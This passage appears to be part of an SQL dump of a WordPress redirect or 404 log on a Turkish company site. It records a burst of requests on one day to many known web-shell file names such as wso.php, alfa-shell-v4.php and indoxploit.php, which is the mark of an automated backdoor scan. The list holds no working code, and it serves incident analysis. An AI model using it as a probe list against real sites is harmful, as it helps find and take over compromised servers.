00:00:00',301),(35379,'http://3s-technologies.com.tr/en/kyami.php',NULL,'www.google.com','',7,0,'2024-07-19 04:16:26','0000-00-00 00:00:00',301),(35380,'https://3s-technologies.com.tr/en/kyami.php',NULL,'www.google.com','',2,0,'2024-07-19 04:16:30','0000-00-00 00:00:00',301),(35381,'http://3s-technologies.com.tr/en/wp-includes/class-wp-other.php',NULL,'www.google.com','',10,0,'2024-07-19 04:16:33','0000-00-00 00:00:00',301),(35382,'https://3s-technologies.com.tr/en/wp-includes/class-wp-other.php',NULL,'www.google.com','',10,0,'2024-07-19 04:16:36','0000-00-00 00:00:00',301),(35383,'https://3s-technologies.com.tr/en/unknown.php',NULL,'www.google.com','',11,0,'2024-07-19 04:16:43','0000-00-00 00:00:00',301),(35384,'http://3s-technologies.com.tr/en/god4m.php',NULL,'www.google.com','',20,0,'2024-07-19 04:16:47','0000-00-00 00:00:00',301),(35385,'https://3s-technologies.com.tr/en/god4m.php',NULL,'www.google.com','',11,0,'2024-07-19 04:16:50','0000-00-00 00:00:00',301),(35386,'https://3s-technologies.com.tr/en/tuco.php',NULL,'www.google.com','',12,0,'2024-07-19 04:16:57','0000-00-00 00:00:00',301),(35387,'https://3s-technologies.com.tr/en/x.php',NULL,'www.google.com','',14,0,'2024-07-19 04:17:05','0000-00-00 00:00:00',301),(35388,'https://3s-technologies.com.tr/en/w.php',NULL,'www.google.com','',12,0,'2024-07-19 04:17:12','0000-00-00 00:00:00',301),(35389,'https://3s-technologies.com.tr/en/shl.php',NULL,'www.google.com','',11,0,'2024-07-19 04:17:19','0000-00-00 00:00:00',301),(35390,'https://3s-technologies.com.tr/en/wp-class.php',NULL,'www.google.com','',13,0,'2024-07-19 04:17:26','0000-00-00 00:00:00',301),(35391,'https://3s-technologies.com.tr/en/o.php',NULL,'www.google.com','',12,0,'2024-07-19 04:17:40','0000-00-00 00:00:00',301),(35392,'https://3s-technologies.com.tr/en/shx.php',NULL,'www.google.com','',12,0,'2024-07-19 04:17:47','0000-00-00 00:00:00',301),(35393,'https://3s-technologies.com.tr/en/l.php',NULL,'www.google.com','',12,0,'2024-07-19 04:17:54','0000-00-00 00:00:00',301),(35394,'http://3s-technologies.com.tr/en/hi.php',NULL,'www.google.com','',11,0,'2024-07-19 04:17:58','0000-00-00 00:00:00',301),(35395,'https://3s-technologies.com.tr/en/hi.php',NULL,'www.google.com','',11,0,'2024-07-19 04:18:02','0000-00-00 00:00:00',301),(35396,'https://3s-technologies.com.tr/en/readme.php',NULL,'www.google.com','',11,0,'2024-07-19 04:18:09','0000-00-00 00:00:00',301),(35397,'http://3s-technologies.com.tr/en/pi.php',NULL,'www.google.com','',13,0,'2024-07-19 04:18:13','0000-00-00 00:00:00',301),(35398,'https://3s-technologies.com.tr/en/pi.php',NULL,'www.google.com','',15,0,'2024-07-19 04:18:16','0000-00-00 00:00:00',301),(35399,'https://3s-technologies.com.tr/en/r00t.php',NULL,'www.google.com','',10,0,'2024-07-19 04:18:24','0000-00-00 00:00:00',301),(35400,'https://3s-technologies.com.tr/en/content.php',NULL,'www.google.com','',13,0,'2024-07-19 04:18:38','0000-00-00 00:00:00',301),(35401,'https://3s-technologies.com.tr/en/css.php',NULL,'www.google.com','',12,0,'2024-07-19 04:18:59','0000-00-00 00:00:00',301),(35402,'https://3s-technologies.com.tr/en/doc.php',NULL,'www.google.com','',13,0,'2024-07-19 04:19:06','0000-00-00 00:00:00',301),(35403,'https://3s-technologies.com.tr/en/wp_wrong_datlib.php',NULL,'www.google.com','',12,0,'2024-07-19 04:19:12','0000-00-00 00:00:00',301),(35404,'https://3s-technologies.com.tr/en/v.php',NULL,'www.google.com','',13,0,'2024-07-19 04:19:19','0000-00-00 00:00:00',301),(35405,'https://3s-technologies.com.tr/en/up.php',NULL,'www.google.com','',15,0,'2024-07-19 04:19:32','0000-00-00 00:00:00',301),(35406,'https://3s-technologies.com.tr/en/wp-atom.php',NULL,'www.google.com','',11,0,'2024-07-19 04:19:59','0000-00-00 00:00:00',301),(35407,'https://3s-technologies.com.tr/en/wikindex.php',NULL,'www.google.com','',13,0,'2024-07-19 04:20:28','0000-00-00 00:00:00',301),(35408,'https://3s-technologies.com.tr/en/wp-conflg.php',NULL,'www.google.com','',11,0,'2024-07-19 04:20:42','0000-00-00 00:00:00',301),(35409,'https://3s-technologies.com.tr/en/wp-inlcudes.php?katib',NULL,'www.google.com','',1,0,'2024-07-19 04:20:56','0000-00-00 00:00:00',301),(35410,'http://3s-technologies.com.tr/en/wp-js.php?phpshells',NULL,'www.google.com','',1,0,'2024-07-19 04:20:59','0000-00-00 00:00:00',301),(35411,'https://3s-technologies.com.tr/en/wp-js.php?phpshells',NULL,'www.google.com','',1,0,'2024-07-19 04:21:03','0000-00-00 00:00:00',301),(35412,'https://3s-technologies.com.tr/en/wp-load.php?daksldlkdsadas=1',NULL,'www.google.com','',1,0,'2024-07-19 04:21:10','0000-00-00 00:00:00',301),(35413,'http://3s-technologies.com.tr/en/sys.php',NULL,'www.google.com','',13,0,'2024-07-19 04:21:13','0000-00-00 00:00:00',301),(35414,'https://3s-technologies.com.tr/en/sys.php',NULL,'www.google.com','',11,0,'2024-07-19 04:21:16','0000-00-00 00:00:00',301),(35415,'https://3s-technologies.com.tr/en/0.php',NULL,'www.google.com','',12,0,'2024-07-19 04:21:23','0000-00-00 00:00:00',301),(35416,'https://3s-technologies.com.tr/en/0byte.php',NULL,'www.google.com','',12,0,'2024-07-19 04:21:30','0000-00-00 00:00:00',301),(35417,'http://3s-technologies.com.tr/en/wp-config-sample.php',NULL,'www.google.com','',14,0,'2024-07-19 04:21:33','0000-00-00 00:00:00',301),(35418,'https://3s-technologies.com.tr/en/wp-config-sample.php',NULL,'www.google.com','',11,0,'2024-07-19 04:21:36','0000-00-00 00:00:00',301),(35419,'http://3s-technologies.com.tr/en/0z.php',NULL,'www.google.com','',12,0,'2024-07-19 04:21:38','0000-00-00 00:00:00',301),(35420,'https://3s-technologies.com.tr/en/0z.php',NULL,'www.google.com','',12,0,'2024-07-19 04:21:42','0000-00-00 00:00:00',301),(35421,'http://3s-technologies.com.tr/en/shell=dead',NULL,'www.google.com','',2,0,'2024-07-19 04:21:51','0000-00-00 00:00:00',301),(35422,'https://3s-technologies.com.tr/en/shell=dead',NULL,'www.google.com','',2,0,'2024-07-19 04:21:54','0000-00-00 00:00:00',301),(35423,'https://3s-technologies.com.tr/en/404.php',NULL,'www.google.com','',14,0,'2024-07-19 04:22:07','0000-00-00 00:00:00',301),(35424,'http://3s-technologies.com.tr/en/45.php',NULL,'www.google.com','',13,0,'2024-07-19 04:22:10','0000-00-00 00:00:00',301),(35425,'https://3s-technologies.com.tr/en/45.php',NULL,'www.google.com','',11,0,'2024-07-19 04:22:13','0000-00-00 00:00:00',301),(35426,'https://3s-technologies.com.tr/en/73.php',NULL,'www.google.com','',11,0,'2024-07-19 04:22:19','0000-00-00 00:00:00',301),(35427,'https://3s-technologies.com.tr/en/a.php',NULL,'www.google.com','',13,0,'2024-07-19 04:22:25','0000-00-00 00:00:00',301),(35428,'http://3s-technologies.com.tr/en/abc.php',NULL,'www.google.com','',13,0,'2024-07-19 04:22:28','0000-00-00 00:00:00',301),(35429,'https://3s-technologies.com.tr/en/abc.php',NULL,'www.google.com','',11,0,'2024-07-19 04:22:32','0000-00-00 00:00:00',301),(35430,'http://3s-technologies.com.tr/en/al.php',NULL,'www.google.com','',12,0,'2024-07-19 04:22:35','0000-00-00 00:00:00',301),(35431,'https://3s-technologies.com.tr/en/al.php',NULL,'www.google.com','',11,0,'2024-07-19 04:22:38','0000-00-00 00:00:00',301),(35432,'https://3s-technologies.com.tr/en/alf.php',NULL,'www.google.com','',12,0,'2024-07-19 04:22:45','0000-00-00 00:00:00',301),(35433,'https://3s-technologies.com.tr/en/user.php',NULL,'www.google.com','',11,0,'2024-07-19 04:22:52','0000-00-00 00:00:00',301),(35434,'http://3s-technologies.com.tr/en/litespeed.php',NULL,'www.google.com','',11,0,'2024-07-19 04:22:55','0000-00-00 00:00:00',301),(35435,'https://3s-technologies.com.tr/en/litespeed.php',NULL,'www.google.com','',11,0,'2024-07-19 04:22:59','0000-00-00 00:00:00',301),(35436,'https://3s-technologies.com.tr/en/alfa-shell-v4.php',NULL,'www.google.com','',10,0,'2024-07-19 04:23:05','0000-00-00 00:00:00',301),(35437,'https://3s-technologies.com.tr/en/alfa.php',NULL,'www.google.com','',14,0,'2024-07-19 04:23:12','0000-00-00 00:00:00',301),(35438,'http://3s-technologies.com.tr/en/admin404.php',NULL,'www.google.com','',11,0,'2024-07-19 04:23:16','0000-00-00 00:00:00',301),(35439,'https://3s-technologies.com.tr/en/admin404.php',NULL,'www.google.com','',11,0,'2024-07-19 04:23:20','0000-00-00 00:00:00',301),(35440,'http://3s-technologies.com.tr/en/alfateslav4.php',NULL,'www.google.com','',10,0,'2024-07-19 04:23:23','0000-00-00 00:00:00',301),(35441,'https://3s-technologies.com.tr/en/alfateslav4.php',NULL,'www.google.com','',10,0,'2024-07-19 04:23:26','0000-00-00 00:00:00',301),(35442,'http://3s-technologies.com.tr/en/abby.php',NULL,'www.google.com','',11,0,'2024-07-19 04:23:30','0000-00-00 00:00:00',301),(35443,'https://3s-technologies.com.tr/en/abby.php',NULL,'www.google.com','',11,0,'2024-07-19 04:23:33','0000-00-00 00:00:00',301),(35444,'http://3s-technologies.com.tr/en/anons79.php',NULL,'www.google.com','',11,0,'2024-07-19 04:23:43','0000-00-00 00:00:00',301),(35445,'https://3s-technologies.com.tr/en/anons79.php',NULL,'www.google.com','',11,0,'2024-07-19 04:23:47','0000-00-00 00:00:00',301),(35446,'https://3s-technologies.com.tr/en/base.php',NULL,'www.google.com','',11,0,'2024-07-19 04:23:53','0000-00-00 00:00:00',301),(35447,'https://3s-technologies.com.tr/en/batm.php',NULL,'www.google.com','',11,0,'2024-07-19 04:24:00','0000-00-00 00:00:00',301),(35448,'http://3s-technologies.com.tr/en/bj.php',NULL,'www.google.com','',11,0,'2024-07-19 04:24:04','0000-00-00 00:00:00',301),(35449,'https://3s-technologies.com.tr/en/bj.php',NULL,'www.google.com','',11,0,'2024-07-19 04:24:07','0000-00-00 00:00:00',301),(35450,'http://3s-technologies.com.tr/en/black.php',NULL,'www.google.com','',37,0,'2024-07-19 04:24:10','0000-00-00 00:00:00',301),(35451,'https://3s-technologies.com.tr/en/black.php',NULL,'www.google.com','',11,0,'2024-07-19 04:24:14','0000-00-00 00:00:00',301),(35452,'http://3s-technologies.com.tr/en/adm.php',NULL,'www.google.com','',13,0,'2024-07-19 04:24:17','0000-00-00 00:00:00',301),(35453,'https://3s-technologies.com.tr/en/adm.php',NULL,'www.google.com','',11,0,'2024-07-19 04:24:20','0000-00-00 00:00:00',301),(35454,'https://3s-technologies.com.tr/en/sh.php',NULL,'www.google.com','',12,0,'2024-07-19 04:24:28','0000-00-00 00:00:00',301),(35455,'https://3s-technologies.com.tr/en/by.php',NULL,'www.google.com','',11,0,'2024-07-19 04:24:35','0000-00-00 00:00:00',301),(35456,'https://3s-technologies.com.tr/en/byp.php',NULL,'www.google.com','',11,0,'2024-07-19 04:24:43','0000-00-00 00:00:00',301),(35457,'http://3s-technologies.com.tr/en/bypas.php',NULL,'www.google.com','',11,0,'2024-07-19 04:24:47','0000-00-00 00:00:00',301),(35458,'https://3s-technologies.com.tr/en/bypas.php',NULL,'www.google.com','',11,0,'2024-07-19 04:24:51','0000-00-00 00:00:00',301),(35459,'https://3s-technologies.com.tr/en/bypass.php',NULL,'www.google.com','',13,0,'2024-07-19 04:24:59','0000-00-00 00:00:00',301),(35460,'https://3s-technologies.com.tr/en/byps.php',NULL,'www.google.com','',11,0,'2024-07-19 04:25:07','0000-00-00 00:00:00',301),(35461,'https://3s-technologies.com.tr/en/c.php',NULL,'www.google.com','',13,0,'2024-07-19 04:25:14','0000-00-00 00:00:00',301),(35462,'http://3s-technologies.com.tr/en/con.php',NULL,'www.google.com','',13,0,'2024-07-19 04:25:17','0000-00-00 00:00:00',301),(35463,'https://3s-technologies.com.tr/en/con.php',NULL,'www.google.com','',11,0,'2024-07-19 04:25:21','0000-00-00 00:00:00',301),(35464,'http://3s-technologies.com.tr/en/con7.php',NULL,'www.google.com','',13,0,'2024-07-19 04:25:25','0000-00-00 00:00:00',301),(35465,'https://3s-technologies.com.tr/en/con7.php',NULL,'www.google.com','',11,0,'2024-07-19 04:25:29','0000-00-00 00:00:00',301),(35466,'http://3s-technologies.com.tr/en/con7ext.php',NULL,'www.google.com','',11,0,'2024-07-19 04:25:32','0000-00-00 00:00:00',301),(35467,'https://3s-technologies.com.tr/en/con7ext.php',NULL,'www.google.com','',11,0,'2024-07-19 04:25:36','0000-00-00 00:00:00',301),(35468,'http://3s-technologies.com.tr/en/dbx.php',NULL,'www.google.com','',12,0,'2024-07-19 04:25:39','0000-00-00 00:00:00',301),(35469,'https://3s-technologies.com.tr/en/dbx.php',NULL,'www.google.com','',10,0,'2024-07-19 04:25:42','0000-00-00 00:00:00',301),(35470,'https://3s-technologies.com.tr/en/defau1t.php',NULL,'www.google.com','',12,0,'2024-07-19 04:25:49','0000-00-00 00:00:00',301),(35471,'http://3s-technologies.com.tr/en/eviltwin.php',NULL,'www.google.com','',12,0,'2024-07-19 04:25:52','0000-00-00 00:00:00',301),(35472,'https://3s-technologies.com.tr/en/eviltwin.php',NULL,'www.google.com','',12,0,'2024-07-19 04:25:56','0000-00-00 00:00:00',301),(35473,'http://3s-technologies.com.tr/en/dev.php',NULL,'www.google.com','',13,0,'2024-07-19 04:26:00','0000-00-00 00:00:00',301),(35474,'https://3s-technologies.com.tr/en/dev.php',NULL,'www.google.com','',11,0,'2024-07-19 04:26:03','0000-00-00 00:00:00',301),(35475,'http://3s-technologies.com.tr/en/docindex.php',NULL,'www.google.com','',13,0,'2024-07-19 04:26:07','0000-00-00 00:00:00',301),(35476,'https://3s-technologies.com.tr/en/docindex.php',NULL,'www.google.com','',11,0,'2024-07-19 04:26:11','0000-00-00 00:00:00',301),(35477,'https://3s-technologies.com.tr/en/dz.php',NULL,'www.google.com','',2,0,'2024-07-19 04:26:18','0000-00-00 00:00:00',301),(35478,'https://3s-technologies.com.tr/en/e.php',NULL,'www.google.com','',12,0,'2024-07-19 04:26:25','0000-00-00 00:00:00',301),(35479,'https://3s-technologies.com.tr/en/error.php?phpshells',NULL,'www.google.com','',1,0,'2024-07-19 04:26:32','0000-00-00 00:00:00',301),(35480,'https://3s-technologies.com.tr/en/evil.php',NULL,'www.google.com','',12,0,'2024-07-19 04:26:40','0000-00-00 00:00:00',301),(35481,'http://3s-technologies.com.tr/en/file.php',NULL,'www.google.com','',209,0,'2024-07-19 04:26:44','0000-00-00 00:00:00',301),(35482,'https://3s-technologies.com.tr/en/file.php',NULL,'www.google.com','',16,0,'2024-07-19 04:26:48','0000-00-00 00:00:00',301),(35483,'https://3s-technologies.com.tr/en/fox.php',NULL,'www.google.com','',12,0,'2024-07-19 04:26:55','0000-00-00 00:00:00',301),(35484,'https://3s-technologies.com.tr/en/foxwso.php',NULL,'www.google.com','',12,0,'2024-07-19 04:27:02','0000-00-00 00:00:00',301),(35485,'https://3s-technologies.com.tr/en/gel4y.php',NULL,'www.google.com','',12,0,'2024-07-19 04:27:10','0000-00-00 00:00:00',301),(35486,'https://3s-technologies.com.tr/en/gelay.php',NULL,'www.google.com','',12,0,'2024-07-19 04:27:18','0000-00-00 00:00:00',301),(35487,'http://3s-technologies.com.tr/en/gh.php',NULL,'www.google.com','',10,0,'2024-07-19 04:27:21','0000-00-00 00:00:00',301),(35488,'https://3s-technologies.com.tr/en/gh.php',NULL,'www.google.com','',10,0,'2024-07-19 04:27:25','0000-00-00 00:00:00',301),(35489,'https://3s-technologies.com.tr/en/hehe.php',NULL,'www.google.com','',10,0,'2024-07-19 04:27:32','0000-00-00 00:00:00',301),(35490,'https://3s-technologies.com.tr/en/i.php',NULL,'www.google.com','',15,0,'2024-07-19 04:27:39','0000-00-00 00:00:00',301),(35491,'https://3s-technologies.com.tr/en/id.php',NULL,'www.google.com','',10,0,'2024-07-19 04:27:47','0000-00-00 00:00:00',301),(35492,'https://3s-technologies.com.tr/en/ids.php',NULL,'www.google.com','',11,0,'2024-07-19 04:27:54','0000-00-00 00:00:00',301),(35493,'https://3s-technologies.com.tr/en/idx.php',NULL,'www.google.com','',11,0,'2024-07-19 04:28:01','0000-00-00 00:00:00',301),(35494,'https://3s-technologies.com.tr/en/indoxploit.php',NULL,'www.google.com','',13,0,'2024-07-19 04:28:08','0000-00-00 00:00:00',301),(35495,'https://3s-technologies.com.tr/en/init.php',NULL,'www.google.com','',11,0,'2024-07-19 04:28:15','0000-00-00 00:00:00',301),(35496,'http://3s-technologies.com.tr/en/iq.php',NULL,'www.google.com','',10,0,'2024-07-19 04:28:19','0000-00-00 00:00:00',301),(35497,'https://3s-technologies.com.tr/en/iq.php',NULL,'www.google.com','',10,0,'2024-07-19 04:28:22','0000-00-00 00:00:00',301),(35498,'http://3s-technologies.com.tr/en/iqb.php',NULL,'www.google.com','',10,0,'2024-07-19 04:28:26','0000-00-00 00:00:00',301),(35499,'https://3s-technologies.com.tr/en/iqb.php',NULL,'www.google.com','',10,0,'2024-07-19 04:28:30','0000-00-00 00:00:00',301),(35500,'https://3s-technologies.com.tr/en/k.php',NULL,'www.google.com','',11,0,'2024-07-19 04:28:37','0000-00-00 00:00:00',301),(35501,'http://3s-technologies.com.tr/en/kk.php',NULL,'www.google.com','',13,0,'2024-07-19 04:28:40','0000-00-00 00:00:00',301),(35502,'https://3s-technologies.com.tr/en/kk.php',NULL,'www.google.com','',11,0,'2024-07-19 04:28:43','0000-00-00 00:00:00',301),(35503,'https://3s-technologies.com.tr/en/la.php',NULL,'www.google.com','',10,0,'2024-07-19 04:28:50','0000-00-00 00:00:00',301),(35504,'https://3s-technologies.com.tr/en/lol.php',NULL,'www.google.com','',12,0,'2024-07-19 04:28:57','0000-00-00 00:00:00',301),(35505,'http://3s-technologies.com.tr/en/lolzk.php',NULL,'www.google.com','',2,0,'2024-07-19 04:29:01','0000-00-00 00:00:00',301),(35506,'https://3s-technologies.com.tr/en/lolzk.php',NULL,'www.google.com','',2,0,'2024-07-19 04:29:04','0000-00-00 00:00:00',301),(35507,'https://3s-technologies.com.tr/en/m.php',NULL,'www.google.com','',12,0,'2024-07-19 04:29:11','0000-00-00 00:00:00',301),(35508,'https://3s-technologies.com.tr/en/mar.php',NULL,'www.google.com','',12,0,'2024-07-19 04:29:18','0000-00-00 00:00:00',301),(35509,'https://3s-technologies.com.tr/en/marijuana.php',NULL,'www.google.com','',13,0,'2024-07-19 04:29:26','0000-00-00 00:00:00',301),(35510,'https://3s-technologies.com.tr/en/mas.php',NULL,'www.google.com','',10,0,'2024-07-19 04:29:33','0000-00-00 00:00:00',301),(35511,'http://3s-technologies.com.tr/en/mi.php',NULL,'www.google.com','',11,0,'2024-07-19 04:29:36','0000-00-00 00:00:00',301),(35512,'https://3s-technologies.com.tr/en/mi.php',NULL,'www.google.com','',11,0,'2024-07-19 04:29:39','0000-00-00 00:00:00',301),(35513,'http://3s-technologies.com.tr/en/min.php',NULL,'www.google.com','',13,0,'2024-07-19 04:29:43','0000-00-00 00:00:00',301),(35514,'https://3s-technologies.com.tr/en/min.php',NULL,'www.google.com','',11,0,'2024-07-19 04:29:46','0000-00-00 00:00:00',301),(35515,'https://3s-technologies.com.tr/en/mini.php',NULL,'www.google.com','',14,0,'2024-07-19 04:29:53','0000-00-00 00:00:00',301),(35516,'http://3s-technologies.com.tr/en/yan.php',NULL,'www.google.com','',11,0,'2024-07-19 04:29:56','0000-00-00 00:00:00',301),(35517,'https://3s-technologies.com.tr/en/yan.php',NULL,'www.google.com','',11,0,'2024-07-19 04:30:01','0000-00-00 00:00:00',301),(35518,'https://3s-technologies.com.tr/en/minishell.php',NULL,'www.google.com','',11,0,'2024-07-19 04:30:09','0000-00-00 00:00:00',301),(35519,'http://3s-technologies.com.tr/en/mrjn.php',NULL,'www.google.com','',14,0,'2024-07-19 04:30:12','0000-00-00 00:00:00',301),(35520,'https://3s-technologies.com.tr/en/mrjn.php',NULL,'www.google.com','',12,0,'2024-07-19 04:30:16','0000-00-00 00:00:00',301),(35521,'https://3s-technologies.com.tr/en/n.php',NULL,'www.google.com','',12,0,'2024-07-19 04:30:23','0000-00-00 00:00:00',301),(35522,'http://3s-technologies.com.tr/en/new-index.php',NULL,'www.google.com','',15,0,'2024-07-19 04:30:27','0000-00-00 00:00:00',301),(35523,'https://3s-technologies.com.tr/en/new-index.php',NULL,'www.google.com','',13,0,'2024-07-19 04:30:31','0000-00-00 00:00:00',301),(35524,'https://3s-technologies.com.tr/en/ninja.php',NULL,'www.google.com','',11,0,'2024-07-19 04:30:38','0000-00-00 00:00:00',301),(35525,'https://3s-technologies.com.tr/en/old-index.php',NULL,'www.google.com','',13,0,'2024-07-19 04:30:45','0000-00-00 00:00:00',301),(35526,'https://3s-technologies.com.tr/en/olux.php',NULL,'www.google.com','',3,0,'2024-07-19 04:30:53','0000-00-00 00:00:00',301),(35527,'https://3s-technologies.com.tr/en/postfs.php',NULL,'www.google.com','',2,0,'2024-07-19 04:31:00','0000-00-00 00:00:00',301),(35528,'https://3s-technologies.com.tr/en/pref.php',NULL,'www.google.com','',11,0,'2024-07-19 04:31:07','0000-00-00 00:00:00',301),(35529,'https://3s-technologies.com.tr/en/priv.php',NULL,'www.google.com','',13,0,'2024-07-19 04:31:14','0000-00-00 00:00:00',301),(35530,'https://3s-technologies.com.tr/en/priv8.php',NULL,'www.google.com','',14,0,'2024-07-19 04:31:21','0000-00-00 00:00:00',301),(35531,'http://3s-technologies.com.tr/en/qindex.php',NULL,'www.google.com','',14,0,'2024-07-19 04:31:24','0000-00-00 00:00:00',301),(35532,'https://3s-technologies.com.tr/en/qindex.php',NULL,'www.google.com','',12,0,'2024-07-19 04:31:27','0000-00-00 00:00:00',301),(35533,'https://3s-technologies.com.tr/en/r.php',NULL,'www.google.com','',12,0,'2024-07-19 04:31:34','0000-00-00 00:00:00',301),(35534,'http://3s-technologies.com.tr/en/rex.php',NULL,'www.google.com','',13,0,'2024-07-19 04:31:38','0000-00-00 00:00:00',301),(35535,'https://3s-technologies.com.tr/en/rex.php',NULL,'www.google.com','',11,0,'2024-07-19 04:31:41','0000-00-00 00:00:00',301),(35536,'https://3s-technologies.com.tr/en/root.php',NULL,'www.google.com','',12,0,'2024-07-19 04:31:48','0000-00-00 00:00:00',301),(35537,'https://3s-technologies.com.tr/en/s.php',NULL,'www.google.com','',12,0,'2024-07-19 04:31:55','0000-00-00 00:00:00',301),(35538,'https://3s-technologies.com.tr/en/shell.php',NULL,'www.google.com','',14,0,'2024-07-19 04:32:02','0000-00-00 00:00:00',301),(35539,'https://3s-technologies.com.tr/en/shells.php',NULL,'www.google.com','',12,0,'2024-07-19 04:32:17','0000-00-00 00:00:00',301),(35540,'http://3s-technologies.com.tr/en/sql.php',NULL,'www.google.com','',13,0,'2024-07-19 04:32:20','0000-00-00 00:00:00',301),(35541,'https://3s-technologies.com.tr/en/sql.php',NULL,'www.google.com','',11,0,'2024-07-19 04:32:24','0000-00-00 00:00:00',301),(35542,'http://3s-technologies.com.tr/en/srx.php',NULL,'www.google.com','',14,0,'2024-07-19 04:32:27','0000-00-00 00:00:00',301),(35543,'https://3s-technologies.com.tr/en/srx.php',NULL,'www.google.com','',12,0,'2024-07-19 04:32:31','0000-00-00 00:00:00',301),(35544,'https://3s-technologies.com.tr/en/sym.php',NULL,'www.google.com','',12,0,'2024-07-19 04:32:38','0000-00-00 00:00:00',301),(35545,'http://3s-technologies.com.tr/en/sym403.php',NULL,'www.google.com','',14,0,'2024-07-19 04:32:41','0000-00-00 00:00:00',301),(35546,'https://3s-technologies.com.tr/en/sym403.php',NULL,'www.google.com','',12,0,'2024-07-19 04:32:45','0000-00-00 00:00:00',301),(35547,'https://3s-technologies.com.tr/en/t.php',NULL,'www.google.com','',12,0,'2024-07-19 04:32:52','0000-00-00 00:00:00',301),(35548,'http://3s-technologies.com.tr/en/tes.php',NULL,'www.google.com','',13,0,'2024-07-19 04:32:55','0000-00-00 00:00:00',301),(35549,'https://3s-technologies.com.tr/en/tes.php',NULL,'www.google.com','',11,0,'2024-07-19 04:32:58','0000-00-00 00:00:00',301),(35550,'https://3s-technologies.com.tr/en/tesla.php',NULL,'www.google.com','',2,0,'2024-07-19 04:33:06','0000-00-00 00:00:00',301),(35551,'http://3s-technologies.com.tr/en/indosec.php',NULL,'www.google.com','',12,0,'2024-07-19 04:33:09','0000-00-00 00:00:00',301),(35552,'https://3s-technologies.com.tr/en/indosec.php',NULL,'www.google.com','',12,0,'2024-07-19 04:33:13','0000-00-00 00:00:00',301),(35553,'https://3s-technologies.com.tr/en/test.php',NULL,'www.google.com','',16,0,'2024-07-19 04:33:20','0000-00-00 00:00:00',301),(35554,'https://3s-technologies.com.tr/en/tshop.php',NULL,'www.google.com','',2,0,'2024-07-19 04:33:27','0000-00-00 00:00:00',301),(35555,'http://3s-technologies.com.tr/en/twin.php',NULL,'www.google.com','',13,0,'2024-07-19 04:33:30','0000-00-00 00:00:00',301),(35556,'https://3s-technologies.com.tr/en/twin.php',NULL,'www.google.com','',11,0,'2024-07-19 04:33:33','0000-00-00 00:00:00',301),(35557,'https://3s-technologies.com.tr/en/u.php',NULL,'www.google.com','',12,0,'2024-07-19 04:33:39','0000-00-00 00:00:00',301),(35558,'https://3s-technologies.com.tr/en/upload.php',NULL,'www.google.com','',14,0,'2024-07-19 04:33:46','0000-00-00 00:00:00',301),(35559,'https://3s-technologies.com.tr/en/uploader.php',NULL,'www.google.com','',12,0,'2024-07-19 04:33:53','0000-00-00 00:00:00',301),(35560,'http://3s-technologies.com.tr/en/usb.php',NULL,'www.google.com','',10,0,'2024-07-19 04:33:56','0000-00-00 00:00:00',301),(35561,'https://3s-technologies.com.tr/en/usb.php',NULL,'www.google.com','',10,0,'2024-07-19 04:33:59','0000-00-00 00:00:00',301),(35562,'http://3s-technologies.com.tr/en/usr.php',NULL,'www.google.com','',10,0,'2024-07-19 04:34:03','0000-00-00 00:00:00',301),(35563,'https://3s-technologies.com.tr/en/usr.php',NULL,'www.google.com','',10,0,'2024-07-19 04:34:06','0000-00-00 00:00:00',301),(35564,'https://3s-technologies.com.tr/en/v3.php',NULL,'www.google.com','',21,0,'2024-07-19 04:34:12','0000-00-00 00:00:00',301),(35565,'http://3s-technologies.com.tr/en/v4.php',NULL,'www.google.com','',11,0,'2024-07-19 04:34:15','0000-00-00 00:00:00',301),(35566,'https://3s-technologies.com.tr/en/v4.php',NULL,'www.google.com','',11,0,'2024-07-19 04:34:18','0000-00-00 00:00:00',301),(35567,'https://3s-technologies.com.tr/en/vuln.php',NULL,'www.google.com','',12,0,'2024-07-19 04:34:24','0000-00-00 00:00:00',301),(35568,'https://3s-technologies.com.tr/en/wp-admin.php',NULL,'www.google.com','',12,0,'2024-07-19 04:34:36','0000-00-00 00:00:00',301),(35569,'http://3s-technologies.com.tr/en/wp-defaul.php',NULL,'www.google.com','',12,0,'2024-07-19 04:34:39','0000-00-00 00:00:00',301),(35570,'https://3s-technologies.com.tr/en/wp-defaul.php',NULL,'www.google.com','',10,0,'2024-07-19 04:34:43','0000-00-00 00:00:00',301),(35571,'https://3s-technologies.com.tr/en/wp-info.php',NULL,'www.google.com','',13,0,'2024-07-19 04:34:49','0000-00-00 00:00:00',301),(35572,'https://3s-technologies.com.tr/en/wp-mails.php',NULL,'www.google.com','',11,0,'2024-07-19 04:34:55','0000-00-00 00:00:00',301),(35573,'https://3s-technologies.com.tr/en/wp-one.php',NULL,'www.google.com','',12,0,'2024-07-19 04:35:01','0000-00-00 00:00:00',301),(35574,'https://3s-technologies.com.tr/en/mari.php',NULL,'www.google.com','',12,0,'2024-07-19 04:35:08','0000-00-00 00:00:00',301),(35575,'https://3s-technologies.com.tr/en/wp-plugins.php',NULL,'www.google.com','',11,0,'2024-07-19 04:35:15','0000-00-00 00:00:00',301),(35576,'https://3s-technologies.com.tr/en/wp-rss.php',NULL,'www.google.com','',11,0,'2024-07-19 04:35:21','0000-00-00 00:00:00',301),(35577,'https://3s-technologies.com.tr/en/wp-singupp.php',NULL,'www.google.com','',2,0,'2024-07-19 04:35:28','0000-00-00 00:00:00',301),(35578,'https://3s-technologies.com.tr/en/wp-site.php',NULL,'www.google.com','',11,0,'2024-07-19 04:35:35','0000-00-00 00:00:00',301),(35579,'http://3s-technologies.com.tr/en/wp-system.php',NULL,'www.google.com','',13,0,'2024-07-19 04:35:38','0000-00-00 00:00:00',301),(35580,'https://3s-technologies.com.tr/en/wp-system.php',NULL,'www.google.com','',11,0,'2024-07-19 04:35:42','0000-00-00 00:00:00',301),(35581,'https://3s-technologies.com.tr/en/wp-title.php',NULL,'www.google.com','',11,0,'2024-07-19 04:35:48','0000-00-00 00:00:00',301),(35582,'https://3s-technologies.com.tr/en/wp.php',NULL,'www.google.com','',14,0,'2024-07-19 04:35:56','0000-00-00 00:00:00',301),(35583,'https://3s-technologies.com.tr/en/wpindex.php',NULL,'www.google.com','',11,0,'2024-07-19 04:36:03','0000-00-00 00:00:00',301),(35584,'https://3s-technologies.com.tr/en/ws.php',NULL,'www.google.com','',11,0,'2024-07-19 04:36:10','0000-00-00 00:00:00',301),(35585,'https://3s-technologies.com.tr/en/wsanon.php',NULL,'www.google.com','',11,0,'2024-07-19 04:36:17','0000-00-00 00:00:00',301),(35586,'https://3s-technologies.com.tr/en/wso.php',NULL,'www.google.com','',25,0,'2024-07-19 04:36:24','0000-00-00 